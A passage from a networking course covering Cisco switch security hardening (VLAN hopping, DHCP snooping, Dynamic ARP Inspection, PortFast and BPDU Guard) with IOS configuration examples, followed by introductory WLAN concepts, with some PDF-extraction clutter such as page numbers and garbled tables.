Configure the interfaces as nonnegotiating trunks assigned to default VLAN 99.

S1(config-if-range)#switchport mode trunk

S1(config-if-range)#switchport nonegotiate
S1(config-if-range)#switchport trunk native vlan 99
S1(config-if-range)# exit

Use range fa0/5 - 10 to enter interface configuration mode for the unused ports.

S1(config-if-range)#switchport mode access

S1(config-if-range)#switchport access vlan 86
% Access VLAN does not exist. Creating vlan 86
S1(config-if-range)#shutdown
*Mar 1 [Link].883: %LINK-5-CHANGED: Interface FastEthernet0/5, changed state to
administratively down
*Mar 1 [Link].900: %LINK-5-CHANGED: Interface FastEthernet0/6, changed state to
administratively down
*Mar 1 [Link].908: %LINK-5-CHANGED: Interface FastEthernet0/7, changed state to
administratively down
*Mar 1 [Link].917: %LINK-5-CHANGED: Interface FastEthernet0/8, changed state to
administratively down
*Mar 1 [Link].942: %LINK-5-CHANGED: Interface FastEthernet0/9, changed state to
administratively down
*Mar 1 [Link].950: %LINK-5-CHANGED: Interface FastEthernet0/10, changed state to
administratively down
*Mar 1 [Link].890: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet0/5, changed state to down
*Mar 1 [Link].907: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet0/6, changed state to down

53
S1(config-if-range)# exit

Use range fa0/11 - 24 to enter interface configuration mode for the active ports and then configure them to
prevent trunking. S1(config)#interface range fa0/11 – 24

S1(config)#interface range fa0/11 - 24

S1(config-if-range)#switchport mode access
S1(config-if-range)# end
S1#
You have successfully mitigated VLAN hopping attacks on this switch.

11.3 Mitigate DHCP Attacks

11.3.1 DHCP Attack Review

The goal of a DHCP starvation attack is to create a Denial of Service (DoS) for connecting clients. DHCP
starvation attacks require an attack tool such as Gobbler. Recall that DHCP starvation attacks can be
effectively mitigated by using port security because Gobbler uses a unique source MAC address for each
DHCP request sent.

However, mitigating DHCP spoofing attacks requires more protection. Gobbler could be configured to use the
actual interface MAC address as the source Ethernet address, but specify a different Ethernet address in the
DHCP payload. This would render port security ineffective because the source MAC address would be
legitimate.

DHCP spoofing attacks can be mitigated by using DHCP snooping on trusted ports.

11.3.2 DHCP Snooping

DHCP snooping does not rely on source MAC addresses. Instead, DHCP snooping determines whether
DHCP messages are from an administratively configured trusted or untrusted source. It then filters DHCP
messages and rate-limits DHCP traffic from untrusted sources.

Devices under your administrative control, such as switches, routers, and servers, are trusted sources. Any
device beyond the firewall or outside your network is an untrusted source. In addition, all access ports are
generally treated as untrusted sources. The figure shows an example of trusted and untrusted ports.

54
Notice that the rogue DHCP server would be on an untrusted port after enabling DHCP snooping. All
interfaces are treated as untrusted by default. Trusted interfaces are typically trunk links and ports directly
connected to a legitimate DHCP server. These interfaces must be explicitly configured as trusted.

A DHCP table is built that includes the source MAC address of a device on an untrusted port and the IP
address assigned by the DHCP server to that device. The MAC address and IP address are bound together.
Therefore, this table is called the DHCP snooping binding table.

11.3.3 Steps to Implement DHCP Snooping

Use the following steps to enable DHCP snooping:

Step 1. Enable DHCP snooping by using the ip dhcp snooping global configuration command.

Step 2. On trusted ports, use the ip dhcp snooping trust interface configuration command.

Step 3. Limit the number of DHCP discovery messages that can be received per second on untrusted ports by
using the ip dhcp snooping limit rate interface configuration command.

Step 4. Enable DHCP snooping by VLAN, or by a range of VLANs, by using the ip dhcp
snooping vlan global configuration command.

11.3.4 DHCP Snooping Configuration Example

The reference topology for this DHCP snooping example is shown in the figure. Notice that F0/5 is an
untrusted port because it connects to a PC. F0/1 is a trusted port because it connects to the DHCP server.

The following is an example of how to configure DHCP snooping on S1. Notice how DHCP snooping is first
enabled. Then the upstream interface to the DHCP server is explicitly trusted. Next, the range of FastEthernet
ports from F0/5 to F0/24 are untrusted by default, so a rate limit is set to six packets per second. Finally,
DHCP snooping is enabled on VLANS 5, 10, 50, 51, and 52.

55
S1(config)# ip dhcp snooping
S1(config)# interface f0/1
S1(config-if)# ip dhcp snooping trust
S1(config-if)# exit
S1(config)# interface range f0/5 - 24
S1(config-if-range)# ip dhcp snooping limit rate 6
S1(config-if-range)# exit
S1(config)# ip dhcp snooping vlan 5,10,50-52
S1(config)# end
S1#

Use the show ip dhcp snooping privileged EXEC command to verify DHCP snooping and show ip dhcp
snooping binding to view the clients that have received DHCP information, as shown in the example.

Note: DHCP snooping is also required by Dynamic ARP Inspection (DAI), which is the next topic.

S1# show ip dhcp snooping

Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
5,10,50-52
DHCP snooping is operational on following VLANs:
none
DHCP snooping is configured on the following L3 Interfaces:
Insertion of option 82 is enabled
circuit-id default format: vlan-mod-port
remote-id: 0cd9.96d2.3f80 (MAC)
Option 82 on untrusted port is not allowed
Verification of hwaddr field is enabled
Verification of giaddr field is enabled
DHCP snooping trust/rate is configured on the following Interfaces:
Interface Trusted Allow option Rate limit (pps)
----------------------- ------- ------------ ----------------
FastEthernet0/1 yes yes unlimited
Custom circuit-ids:
FastEthernet0/5 no no 6
Custom circuit-ids:
FastEthernet0/6 no no 6
Custom circuit-ids:
S1# show ip dhcp snooping binding
MacAddress IpAddress Lease(sec) Type VLAN Interface
------------------ --------------- ---------- ------------- ---- ----------------
----
[Link] [Link] 193185 dhcp-snooping 5 FastEthernet0/5

56
11.3.5 Syntax Checker – Mitigate DHCP Attacks

Implement DHCP snooping for a switch based on the following topology and specified requirements.

You are currently logged into S1. Enable DHCP snooping globally for the switch.
S1(config)#ip dhcp snooping

Enter interface configuration mode for g0/1 - 2, trust the interfaces, and return to global configuration mode.

S1(config)#interface range g0/1 - 2

S1(config-if-range)#ip dhcp snooping trust
S1(config-if-range)#exit

Enter interface configuration mode for f0/1 - 24, limit the DHCP messages to no more than 10 per second, and
return to global configuration mode.

S1(config)#interface range f0/1 - 24

S1(config-if-range)#ip dhcp snooping limit rate 10
S1(config-if-range)#exit

Enable DHCP snooping for VLANs 10,20,30-49.

S1(config)#ip dhcp snooping vlan 10,20,30-49

S1(config)# exit

Enter the command to verify DHCP snooping.

S1#show ip dhcp snooping

Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
10,20,30-49
DHCP snooping is operational on following VLANs:
none
DHCP snooping is configured on the following L3 Interfaces:
Insertion of option 82 is enabled
circuit-id default format: vlan-mod-port
remote-id: 0cd9.96d2.3f80 (MAC)
Option 82 on untrusted port is not allowed
Verification of hwaddr field is enabled
Verification of giaddr field is enabled

57
DHCP snooping trust/rate is configured on the following Interfaces:
Interface Trusted Allow option Rate limit (pps)
----------------------- ------- ------------ ----------------
GigabitEthernet0/1 yes yes unlimited
Custom circuit-ids:
GigabitEthernet0/2 yes yes unlimited
Custom circuit-ids:
FastEthernet0/1 no no 10
Custom circuit-ids:

Enter the command to verify the current DHCP bindings logged by DHCP snooping

S1#show ip dhcp snooping binding

MacAddress IpAddress Lease(sec) Type VLAN Interface
------------------ --------------- ---------- ------------- ---- --------------------
[Link] [Link] 193185 dhcp-snooping 5 FastEthernet0/1
S1#

You have successfully configured and verified DHCP snooping for the switch.

11.4 Mitigate ARP Attacks

11.4.1 Dynamic ARP Inspection

In a typical ARP attack, a threat actor can send unsolicited ARP requests to other hosts on the subnet with the
MAC Address of the threat actor and the IP address of the default gateway. To prevent ARP spoofing and the
resulting ARP poisoning, a switch must ensure that only valid ARP Requests and Replies are relayed.

Dynamic ARP inspection (DAI) requires DHCP snooping and helps prevent ARP attacks by:

• Not relaying invalid or gratuitous ARP Requests out to other ports in the same VLAN.
• Intercepting all ARP Requests and Replies on untrusted ports.
• Verifying each intercepted packet for a valid IP-to-MAC binding.
• Dropping and logging ARP Requests coming from invalid sources to prevent ARP poisoning.
• Error-disabling the interface if the configured DAI number of ARP packets is exceeded.

11.4.2 DAI Implementation Guidelines

To mitigate the chances of ARP spoofing and ARP poisoning, follow these DAI implementation guidelines:

• Enable DHCP snooping globally.

• Enable DHCP snooping on selected VLANs.
• Enable DAI on selected VLANs.
• Configure trusted interfaces for DHCP snooping and ARP inspection.

It is generally advisable to configure all access switch ports as untrusted and to configure all uplink ports
that are connected to other switches as trusted.

The sample topology in the figure identifies trusted and untrusted ports.

58
 11.4.3 DAI Configuration Example

In the previous topology, S1 is connecting two users on VLAN 10. DAI will be configured to mitigate against
ARP spoofing and ARP poisoning attacks.

As shown in the example, DHCP snooping is enabled because DAI requires the DHCP snooping binding
table to operate. Next, DHCP snooping and ARP inspection are enabled for the PCs on VLAN10. The uplink
port to the router is trusted, and therefore, is configured as trusted for DHCP snooping and ARP inspection.

S1(config)# ip dhcp snooping

S1(config)# ip dhcp snooping vlan 10
S1(config)# ip arp inspection vlan 10
S1(config)# interface fa0/24
S1(config-if)# ip dhcp snooping trust
S1(config-if)# ip arp inspection trust

DAI can also be configured to check for both destination or source MAC and IP addresses:

• Destination MAC - Checks the destination MAC address in the Ethernet header against the target MAC
address in ARP body.
• Source MAC - Checks the source MAC address in the Ethernet header against the sender MAC address in
the ARP body.
• IP address - Checks the ARP body for invalid and unexpected IP addresses including addresses [Link],
[Link], and all IP multicast addresses.

The ip arp inspection validate {[src-mac] [dst-mac] [ip]} global configuration command is used to configure
DAI to drop ARP packets when the IP addresses are invalid. It can be used when the MAC addresses in the
body of the ARP packets do not match the addresses that are specified in the Ethernet header. Notice in the
following example how only one command can be configured. Therefore, entering multiple ip arp inspection
validate commands overwrites the previous command. To include more than one validation method, enter
them on the same command line as shown and verified in the following output.

S1(config)# ip arp inspection validate ?

dst-mac Validate destination MAC address
ip Validate IP addresses
src-mac Validate source MAC address

59
S1(config)# ip arp inspection validate src-mac
S1(config)# ip arp inspection validate dst-mac
S1(config)# ip arp inspection validate ip
S1(config)# do show run | include validate
ip arp inspection validate ip
S1(config)# ip arp inspection validate src-mac dst-mac ip
S1(config)# do show run | include validate
ip arp inspection validate src-mac dst-mac ip
S1(config)#

11.4.4 Syntax Checker – Mitigate ARP Attacks

Implement DAI for a switch based on the following topology and specified requirements.

You are currently logged into S1. Enable DHCP snooping globally for the switch.

S1(config)#ip dhcp snooping

Enter interface configuration mode for g0/1 - 2, trust the interfaces for both DHCP snooping and DAI, and then
return to global configuration mode.

S1(config)#interface range g0/1 - 2

S1(config-if-range)#ip dhcp snooping trust
S1(config-if-range)#ip arp inspection trust
S1(config-if-range)#exit
Enable DHCP snooping and DAI for VLANs 10,20,30-49.
S1(config)#ip dhcp snooping vlan 10,20,30-49
S1(config)#ip arp inspection vlan 10,20,30-49
S1(config)#
You have successfully configured DAI for the switch .

11.5 Mitigate STP Attacks

11.5.1 PortFast and BPDU Guard

Recall that network attackers can manipulate the Spanning Tree Protocol (STP) to conduct an attack by
spoofing the root bridge and changing the topology of a network. To mitigate Spanning Tree Protocol
(STP) manipulation attacks, use PortFast and Bridge Protocol Data Unit (BPDU) Guard:

60
 • PortFast - PortFast immediately brings an interface configured as an access port to the forwarding
state from a blocking state, bypassing the listening and learning states. Apply to all end-user ports.
PortFast should only be configured on ports attached to end devices.
• BPDU Guard - BPDU guard immediately error disables a port that receives a BPDU. Like PortFast,
BPDU guard should only be configured on interfaces attached to end devices.

In the figure, the access ports for S1 should be configured with PortFast and BPDU Guard.

11.5.2 Configure PortFast

PortFast bypasses the STP listening and learning states to minimize the time that access ports must wait for
STP to converge. If PortFast is enabled on a port connecting to another switch, there is a risk of creating a
spanning-tree loop.

PortFast can be enabled on an interface by using the spanning-tree portfast interface configuration
command. Alternatively, Portfast can be configured globally on all access ports by using the spanning-tree
portfast default global configuration command.

To verify whether PortFast is enabled globally you can use either the show running-config | begin
span command or the show spanning-tree summary command. To verify if PortFast is enabled an interface,
use the show running-config interface type/number command, as shown in the following example.
The show spanning-tree interface type/number detail command can also be used for verification.

Notice that when PortFast is enabled, warning messages are displayed.

S1(config)# interface fa0/1

S1(config-if)# switchport mode access
S1(config-if)# spanning-tree portfast
%Warning: portfast should only be enabled on ports connected to a single
host. Connecting hubs, concentrators, switches, bridges, etc... to this
interface when portfast is enabled, can cause temporary bridging loops.
Use with CAUTION
%Portfast has been configured on FastEthernet0/1 but will only
have effect when the interface is in a non-trunking mode.
S1(config-if)# exit
S1(config)# spanning-tree portfast default

61
%Warning: this command enables portfast by default on all interfaces. You
should now disable portfast explicitly on switched ports leading to hubs,
switches and bridges as they may create temporary bridging loops.
S1(config)# exit
S1# show running-config | begin span
spanning-tree mode pvst
spanning-tree portfast default
spanning-tree extend system-id
!
interface FastEthernet0/1
switchport mode access
spanning-tree portfast
!
interface FastEthernet0/2
!
interface FastEthernet0/3
!
interface FastEthernet0/4
!
interface FastEthernet0/5
!
(output omitted)
S1#

11.5.3 Configure BPDU Guard

Even though PortFast is enabled, the interface will still listen for BPDUs. Unexpected BPDUs might be
accidental, or part of an unauthorized attempt to add a switch to the network.

If any BPDUs are received on a BPDU Guard enabled port, that port is put into error-disabled state. This
means the port is shut down and must be manually re-enabled or automatically recovered through
the errdisable recovery cause bpduguard global command.

BPDU Guard can be enabled on a port by using the spanning-tree bpduguard enable interface configuration
command. Alternatively, Use the spanning-tree portfast bpduguard default global configuration command
to globally enable BPDU guard on all PortFast-enabled ports.

To display information about the state of spanning tree, use the show spanning-tree summary command. In
the example, PortFast default and BPDU Guard are both enabled as the default state for ports configured as
access mode.

Note: Always enable BPDU Guard on all PortFast-enabled ports.

S1(config)# interface fa0/1

S1(config-if)# spanning-tree bpduguard enable
S1(config-if)# exit
S1(config)# spanning-tree portfast bpduguard default
S1(config)# end
S1# show spanning-tree summary
Switch is in pvst mode
Root bridge for: none
Extended system ID is enabled

62
Portfast Default is enabled
PortFast BPDU Guard Default is enabled
Portfast BPDU Filter Default is disabled
Loopguard Default is disabled
EtherChannel misconfig guard is enabled
UplinkFast is disabled
BackboneFast is disabled
Configured Pathcost method used is short
(output omitted)
S1#

11.5.4 Syntax Checker – Mitigate STP Attacks

Implement PortFast and BPDU Guard for a switch based on the following topology and specified requirements

You are currently logged into S1. Complete the following steps to implement PortFast and BPDU Guard on all
access ports:

*Enter interface configuration mode for fa0/1 - 24.

*Configure the ports for access mode.

*Return to global configuration mode.

*Enable PortFast by default for all access ports.

*Enable BPDU Guard by default for all access ports.

S1(config)#interface range fa0/1 - 24

S1(config-if-range)#switchport mode access

63
S1(config-if-range)#exit
S1(config)#spanning-tree portfast default
S1(config)#spanning-tree portfast bpduguard default
S1(config)# exit

Verify that PortFast and BPDU Guard is enabled by default by viewing STP summary information.

S1#show spanning-tree summary

Switch is in pvst mode
Root bridge for: none
Extended system ID is enabled
Portfast Default is enabled
PortFast BPDU Guard Default is enabled
Portfast BPDU Filter Default is disabled
Loopguard Default is disabled
EtherChannel misconfig guard is enabled
UplinkFast is disabled
BackboneFast is disabled
Configured Pathcost method used is short
(output omitted)
S1#

You have successfully configured and verified PortFast and BPDU Guard for the switch.

11.6 Module Practice and Quiz

11.6.1 Packet Tracer – Switch Security Configuration

In this Packet Tracer activity, you will:

• Secure unused ports

• Implement port security
• Mitigate VLAN hopping attacks
• Mitigate DHCP attacks
• Mitigate ARP attacks
• Mitigate STP attacks
• Verify the switch security configuration

11.6.2 Lab – Switch Security Configuration

In this lab, you will:

• Secure unused ports

• Implement port security
• Mitigate VLAN hopping attacks
• Mitigate DHCP attacks
• Mitigate ARP attacks
• Mitigate STP attacks
• Verify the switch security configuration

64
11.6.3 What did I learn in this module?

All switch ports (interfaces) should be secured before the switch is deployed for production use. The simplest
and most effective method to prevent MAC address table overflow attacks is to enable port security. By
default, Layer 2 switch ports are set to dynamic auto (trunking on). The switch can be configured to learn
about MAC addresses on a secure port in one of three ways: manually configured, dynamically learned, and
dynamically learned – sticky. Port security aging can be used to set the aging time for static and dynamic
secure addresses on a port. Two types of aging are supported per port: absolute and inactivity. If the MAC
address of a device attached to the port differs from the list of secure addresses, then a port violation occurs.
By default, the port enters the error-disabled state. When a port is shutdown and placed in the error-
disabled state, no traffic is sent or received on that port. To display port security settings for the switch, use
the show port-security command.

To mitigate VLAN hopping attacks:

Step 1. Disable DTP negotiations on non-trunking ports.

Step 2. Disable unused ports.
Step 3. Manually enable the trunk link on a trunking port.
Step 4. Disable DTP negotiations on trunking ports.
Step 5. Set the native VLAN to a VLAN other than VLAN 1.

The goal of a DHCP starvation attack is to create a Denial of Service (DoS) for connecting clients. DHCP
spoofing attacks can be mitigated by using DHCP snooping on trusted ports. DHCP snooping determines
whether DHCP messages are from an administratively-configured trusted or untrusted source. It then filters
DHCP messages and rate-limits DHCP traffic from untrusted sources. Use the following steps to enable
DHCP snooping:

Step 1. Enable DHCP snooping.

Step 2. On trusted ports, use the ip dhcp snooping trust interface configuration command.
Step 3. Limit the number of DHCP discovery messages that can be received per second on untrusted ports.
Step 4. Enable DHCP snooping by VLAN, or by a range of VLANs.

Dynamic ARP inspection (DAI) requires DHCP snooping and helps prevent ARP attacks by:

• Not relaying invalid or gratuitous ARP Replies out to other ports in the same VLAN.
• Intercepting all ARP Requests and Replies on untrusted ports.
• Verifying each intercepted packet for a valid IP-to-MAC binding.
• Dropping and logging ARP Replies coming from invalid to prevent ARP poisoning.
• Error-disabling the interface if the configured DAI number of ARP packets is exceeded.

To mitigate the chances of ARP spoofing and ARP poisoning, follow these DAI implementation guidelines:

• Enable DHCP snooping globally.

• Enable DHCP snooping on selected VLANs.
• Enable DAI on selected VLANs.
• Configure trusted interfaces for DHCP snooping and ARP inspection.

As a general guideline, configure all access switch ports as untrusted and all uplink ports that are connected
to other switches as trusted.

65
DAI can also be configured to check for both destination or source MAC and IP addresses:

• Destination MAC - Checks the destination MAC address in the Ethernet header against the target
MAC address in ARP body.
• Source MAC - Checks the source MAC address in the Ethernet header against the sender MAC
address in the ARP body.
• IP address - Checks the ARP body for invalid and unexpected IP addresses including addresses
[Link], [Link], and all IP multicast addresses.

To mitigate Spanning Tree Protocol (STP) manipulation attacks, use PortFast and Bridge Protocol Data Unit
(BPDU) Guard:

• PortFast - PortFast immediately brings an interface configured as an access or trunk port to the
forwarding state from a blocking state, bypassing the listening and learning states. Apply to all end-
user ports. PortFast should only be configured on ports attached to end devices. PortFast bypasses
the STP listening and learning states to minimize the time that access ports must wait for STP to
converge. If PortFast is enabled on a port connecting to another switch, there is a risk of creating a
spanning-tree loop.
• BPDU Guard - BPDU guard immediately error disables a port that receives a BPDU. Like PortFast,
BPDU guard should only be configured on interfaces attached to end devices. BPDU Guard can be
enabled on a port by using the spanning-tree bpduguard enable interface configuration command.
Alternatively, Use the spanning-tree portfast bpduguard default global configuration command to
globally enable BPDU guard on all PortFast-enabled ports.

11.6.4 Module Quiz – Switch Security Configuration

66
67
68
69
70
71
72
12 WLAN Concepts
12.0.1 Why should I take this module?

Welcome to WLAN Concepts!

Do you use a wireless connection at home, work or school? Ever wonder how it works?

There are many ways to connect wirelessly. Like everything else involving networks, these connection types
are best used in particular situations. They require specific devices and are also prone to certain types of
attacks. And of course, there are solutions to mitigate these attacks. Want to learn more? The WLAN
Concepts module gives you the foundational knowledge you need to understand what Wireless LANs are,
what they can do, and how to protect them.

If you are curious, don’t wait, get started today!

12.0.2 What Will I learn in this module?

Module Title: WLAN Concepts

Module Objective: Explain how WLANs enable network connectivity.

Topic Title Topic Objective

Introduction to
Describe WLAN technology and standards.
Wireless

Components of
Describe the components of a WLAN infrastructure.
WLANs

WLAN Operation Explain how wireless technology enables WLAN operation.

CAPWAP Operation Explain how a WLC uses CAPWAP to manage multiple APs.

73
 Topic Title Topic Objective

Channel
Describe channel management in a WLAN.
Management

WLAN Threats Describe threats to WLANs.

Secure WLANs Describe WLAN security mechanisms.

12.1 Introduction to Wireless

12.1.1 Benefits of Wireless

A Wireless LAN (WLAN) is a type of wireless network that is commonly used in homes, offices, and campus
environments. Networks must support people who are on the move. People connect using computers, laptops,
tablets, and smart phones. There are many different network infrastructures that provide network access, such
as wired LANs, service provider networks, and cell phone networks. But it’s the WLAN that makes mobility
possible within the home and business environments.

In businesses with a wireless infrastructure in place, there can be a cost savings any time equipment changes,
or when relocating an employee within a building, reorganizing equipment or a lab, or moving to temporary
locations or project sites. A wireless infrastructure can adapt to rapidly changing needs and technologies.

12.1.2 Types of Wireless Network

Wireless networks are based on the Institute of Electrical and Electronics Engineers (IEEE) standards and can
be classified broadly into four main types: WPAN, WLAN, WMAN, and WWAN.

74
12.1.3 Wireless Technologies

Wireless technology uses the unlicensed radio spectrum to send and receive data. The unlicensed spectrum
is accessible to anyone who has a wireless router and wireless technology in the device they are using.

75
76
12.1.4 802.11 Standards

The world of wireless communications is vast. However, for particular job-related skills, we want to focus on
specific aspects of Wi Fi. The best place to start is with the IEEE 802.11 WLAN standards. These standards
define how radio frequencies are used for wireless links. Most of the standards specify that wireless devices
have one antenna to transmit and receive wireless signals on the specified radio frequency (2.4 GHz or 5
GHz). Some of the newer standards that transmit and receive at higher speeds require access points (APs)
and wireless clients to have multiple antennas using the multiple-input and multiple-output (MIMO) technology.
MIMO uses multiple antennas as both the transmitter and receiver to improve communication performance.
Up to eight transmit and receive antennas can be used to increase throughput.

Various implementations of the IEEE 802.11 standard have been developed over the years. The table
highlights these standards.

IEEE
Radio
WLAN Description
Frequency
Standard

• speeds of up to 2 Mbps
802.11 2.4 GHz

• speeds of up to 54 Mbps
• small coverage area
802.11a 5 GHz • less effective at penetrating building structures
• not interoperable with the 802.11b and 802.11g

• speeds of up to 11 Mbps
• longer range than 802.11a
802.11b 2.4 GHz
• better able to penetrate building structures

• speeds of up to 54 Mbps
802.11g 2.4 GHz • backward compatible with 802.11b with reduced bandwidth capacity

• data rates range from 150 Mbps to 600 Mbps with a distance range of up to
70 m (230 feet)
2.4 GHz 5• APs and wireless clients require multiple antennas using MIMO technology
802.11n
GHz
• backward compatible with 802.11a/b/g devices with limiting data rates

77
 IEEE
Radio
WLAN Description
Frequency
Standard

• provides data rates ranging from 450 Mbps to 1.3 Gbps (1300 Mbps) using
MIMO technology
802.11ac 5 GHz • Up to eight antennas can be supported
• backwards compatible with 802.11a/n devices with limiting data rates

• latest standard released in 2019

• also known as Wi-Fi 6 or High-Efficiency Wireless (HEW)
• provides improved power efficiency, higher data rates, increased capacity,
2.4 GHz 5 and handles many connected devices
802.11ax
GHz • currently operates using 2.4 GHz and 5 GHz but will use 1 GHz and 7 GHz
when those frequencies become available
• Search the internet for Wi-Fi Generation 6 for more information

12.1.5 Radio Frequencies

All wireless devices operate in the radio waves range of the electromagnetic spectrum. WLAN networks
operate in the 2.4 GHz frequency band and the 5 GHz band. Wireless LAN devices have transmitters and
receivers tuned to specific frequencies of the radio waves range, as shown in the figure. Specifically, the
following frequency bands are allocated to 802.11 wireless LANs:

• 2.4 GHz (UHF) - 802.11b/g/n/ax

• 5 GHz (SHF) - 802.11a/n/ac/ax

wireless devices, and other technologies, and where they operate on the electromagnetic spectrum

The Electromagnetic Spectrum

78
12.1.6 Wireless Standards Organizations

Standards ensure interoperability between devices that are made by different manufacturers. Internationally,
the three organizations influencing WLAN standards are the ITU-R, the IEEE, and the Wi-Fi Alliance.

79
12.1.7 Check Your Understanding – Introduction to Wireless

80
12.2 WLAN Concepts

12.2.1 Video – WLAN Concepts

In the previous topic you learned about the benefits of wireless, types of wireless networks, 802.11 standards,
and radio frequencies. Here we will learn about WLAN components.

12.2.2 Wireless NIC

Wireless deployments require a minimum of two devices that have a radio transmitter and a radio receiver
tuned to the same radio frequencies:

• End devices with wireless NICs

• A network device, such as a wireless router or wireless AP

To communicate wirelessly, laptops, tablets, smart phones, and even the latest automobiles include integrated
wireless NICs that incorporate a radio transmitter/receiver. However, if a device does not have an integrated
wireless NIC, then a USB wireless adapter can be used, as shown in the figure.

Note: Many wireless devices you are familiar with do not have visible antennas. They are embedded inside
smartphones, laptops, and wireless home routers.

81
12.2.3 Wireless Home Router

The type of infrastructure device that an end device associates and authenticates with varies based on the
size and requirement of the WLAN.

For example, a home user typically interconnects wireless devices using a small, wireless router, as shown in
the figure. The wireless router serves as an:

• Access point - This provides 802.11a/b/g/n/ac wireless access.

• Switch - This provides a four-port, full-duplex, 10/100/1000 Ethernet switch to interconnect wired
devices.
• Router - This provides a default gateway for connecting to other network infrastructures, such as the
internet.

A wireless router is commonly implemented as a small business or residential wireless access device. The
wireless router advertises its wireless services by sending beacons containing its shared service set identifier
(SSID). Devices wirelessly discover the SSID and attempt to associate and authenticate with it to access the
local network and internet.

Most wireless routers also provide advanced features, such as high-speed access, support for video
streaming, IPv6 addressing, quality of service (QoS), configuration utilities, and USB ports to connect printers
or portable drives.

Additionally, home users who want to extend their network services can implement Wi-Fi range extenders. A
device can connect wirelessly to the extender, which boosts its communications to be repeated to the wireless
router.

12.2.4 Wireless Access Point

While range extenders are easy to set up and configure, the best solution would be to install another wireless
access point to provide dedicated wireless access to the user devices. Wireless clients use their wireless NIC
to discover nearby APs advertising their SSID. Clients then attempt to associate and authenticate with an AP.
After being authenticated, wireless users have access to network resources. The Cisco Meraki Go APs are
shown in the figure.

12.2.5 AP Categories

APs can be categorized as either autonomous APs or controller-based APs.

Autonomous APs

These are standalone devices configured using a command line interface or a GUI, as shown in the figure.
Autonomous APs are useful in situations where only a couple of APs are required in the organization. A home
router is an example of an autonomous AP because the entire AP configuration resides on the device. If the
wireless demands increase, more APs would be required. Each AP would operate independent of other APs
and each AP would require manual configuration and management. This would become overwhelming if many
APs were needed.

82
Controller-based APs

These devices require no initial configuration and are often called lightweight APs (LAPs). LAPs use the
Lightweight Access Point Protocol (LWAPP) to communicate with a WLAN controller (WLC), as shown in the
next figure. Controller-based APs are useful in situations where many APs are required in the network. As
more APs are added, each AP is automatically configured and managed by the WLC.

Notice in the figure that the WLC has four ports connected to the switching infrastructure. These four ports are
configured as a link aggregation group (LAG) to bundle them together. Much like how EtherChannel operates,
LAG provides redundancy and load-balancing. All the ports on the switch that are connected to the WLC need
to be trunking and configured with EtherChannel on. However, LAG does not operate exactly like
EtherChannel. The WLC does not support Port Aggregation Protocol (PaGP) or Link Aggregation Control
Protocol (LACP).

83
12.2.6 Wireless Antennas

Most business class APs require external antennas to make them fully functioning units.

Omnidirectional Antennas

Omnidirectional Antennas such as the one shown in the figure provide 360-degree coverage and are ideal in
houses, open office areas, conference rooms, and outside areas.

Directional Antennas

Directional antennas focus the radio signal in a given direction. This enhances the signal to and from the AP in
the direction the antenna is pointing This provides a stronger signal strength in one direction and reduced
signal strength in all other directions. Examples of directional Wi-Fi antennas include Yagi and parabolic dish
antennas.

MIMO Antennas

Multiple Input Multiple Output (MIMO) uses multiple antennas to increase available bandwidth for IEEE
802.11n/ac/ax wireless networks. Up to eight transmit and receive antennas can be used to increase
throughput.

12.2.7 Check Your Understanding – WLAN Concepts

84
12.3 WLAN Operation

12.3.1 Video - WLAN Operation

The previous topic covered WLAN components. This topic will cover WLAN operation.

Click Play to view a video about WLAN operation.

85
12.3.2 802.11 Wireless Topology Modes

Wireless LANs can accommodate various network topologies. The 802.11 standard identifies two main
wireless topology modes: Ad hoc mode and Infrastructure mode. Tethering is also a mode sometimes used to
provide quick wireless access.

Ad hoc mode - This is when two devices connect wirelessly in a peer-to-peer (P2P) manner without using
APs or wireless routers. Examples include wireless clients connecting directly to each other using Bluetooth or
Wi-Fi Direct. The IEEE 802.11 standard refers to an ad hoc network as an independent basic service set
(IBSS).

Infrastructure mode - This is when wireless clients interconnect via a wireless router or AP, such as in
WLANs. APs connect to the network infrastructure using the wired distribution system, such as Ethernet.

Tethering - A variation of the ad hoc topology is when a smart phone or tablet with cellular data access is
enabled to create a personal hotspot. This feature is sometimes referred to as tethering. A hotspot is usually a
temporary quick solution that enables a smart phone to provide the wireless services of a Wi-Fi router. Other
devices can associate and authenticate with the smart phone to use the internet connection.

12.3.3 BSS and ESS

Infrastructure mode defines two topology building blocks: A Basic Service Set (BSS) and an Extended Service
Set (ESS).

86
Basic Service Set (BSS)

A BSS consists of a single AP interconnecting all associated wireless clients. Two BSSs are shown in the
figure. The circles depict the coverage area for the BSS, which is called the Basic Service Area (BSA). If a
wireless client moves out of its BSA, it can no longer directly communicate with other wireless clients within
the BSA.

The Layer 2 MAC address of the AP is used to uniquely identify each BSS, which is called the Basic Service
Set Identifier (BSSID). Therefore, the BSSID is the formal name of the BSS and is always associated with only
one AP.

Extended Service Set (ESS)

When a single BSS provides insufficient coverage, two or more BSSs can be joined through a common
distribution system (DS) into an ESS. An ESS is the union of two or more BSSs interconnected by a wired DS.
Each ESS is identified by a SSID and each BSS is identified by its BSSID.

Wireless clients in one BSA can now communicate with wireless clients in another BSA within the same ESS.
Roaming mobile wireless clients may move from one BSA to another (within the same ESS) and seamlessly
connect.

The rectangular area in the figure depicts the coverage area within which members of an ESS may
communicate. This area is called the Extended Service Area (ESA).

87
12.3.4 802.11 Frame Structure

Recall that all Layer 2 frames consist of a header, payload, and Frame Check Sequence (FCS) section. The
802.11 frame format is similar to the Ethernet frame format, except that it contains more fields, as shown in
the figure.

All 802.11 wireless frames contain the following fields:

• Frame Control - This identifies the type of wireless frame and contains subfields for protocol version,
frame type, address type, power management, and security settings.
• Duration - This is typically used to indicate the remaining duration needed to receive the next frame
transmission.

From a wireless device:

• Address 1 Receiver Address - MAC address of the AP.

• Address 2 Transmitter Address - MAC address of the sender.
• Address 3 SA/DA/BSSID - MAC address of the destination which could be a wireless device or wired
device.

From the AP:

• Address 1 Receiver Address - MAC address of the sender.

• Address 2 Transmitter Address - MAC address of the AP.
• Address 3 SA/DA/BSSID - MAC address of the wireless destination.
• Sequence Control - This contains information to control sequencing and fragmented frames.
• Address4 - This usually missing because it is used only in ad hoc mode.
• Payload - This contains the data for transmission.
• FCS - This is used for Layer 2 error control.

12.3.5 CSMA/CA

WLANs are half-duplex, shared media configurations. Half-duplex means that only one client can transmit or
receive at any given moment. Shared media means that wireless clients can all transmit and receive on the
same radio channel. This creates a problem because a wireless client cannot hear while it is sending, which
makes it impossible to detect a collision.

88
